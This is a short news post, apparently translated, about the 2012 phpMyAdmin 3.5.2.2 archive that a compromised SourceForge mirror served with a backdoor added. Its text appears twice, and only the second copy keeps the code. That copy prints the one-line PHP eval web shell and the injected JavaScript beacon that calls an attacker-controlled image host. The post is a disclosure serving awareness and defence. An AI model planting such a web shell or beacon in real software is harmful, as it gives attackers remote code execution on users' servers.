PhpMyAdmin backdoor
September 25, it became aware of the compromise of one of the Korean mirrors SourceForge (cdnetworks-kr-1).
Archive phpMyAdmin-3.5.2.2-all-languages.zip , located on this mirror was introduced backdoor.
The server_sync.php file has been added to the archive , containing the code:
allowing the execution of arbitrary code.
')
Also, the js / cross_framing_protection.js file was modified, the code was added to it:
allowing the attacker to learn about infected copies.
At the moment, the compromised mirror is excluded from the rotation.
The SourceForge team determined from logs that the number of people who downloaded this file was about 400 people. All downloaded, who managed to identify, an email was sent a warning.
An exploit for this vulnerability has already been included in the Metasploit package.
Sources:
corrupted copy server on Korean mirror server
PMASA-2012-5
Compromised SourceForge mirror
Add exploit for phpmyadmin backdoor
Archive phpMyAdmin-3.5.2.2-all-languages.zip , located on this mirror was introduced backdoor.
The server_sync.php file has been added to the archive , containing the code:
<?php @eval($_POST['c']);?> allowing the execution of arbitrary code.
')
Also, the js / cross_framing_protection.js file was modified, the code was added to it:
var icon ; icon = document.createElement("img"); icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg"; icon.width=0; icon.height=0; document.body.appendChild(icon); allowing the attacker to learn about infected copies.
At the moment, the compromised mirror is excluded from the rotation.
The SourceForge team determined from logs that the number of people who downloaded this file was about 400 people. All downloaded, who managed to identify, an email was sent a warning.
An exploit for this vulnerability has already been included in the Metasploit package.
Sources:
corrupted copy server on Korean mirror server
PMASA-2012-5
Compromised SourceForge mirror
Add exploit for phpmyadmin backdoor
Source: https://habr.com/ru/post/152433/
All Articles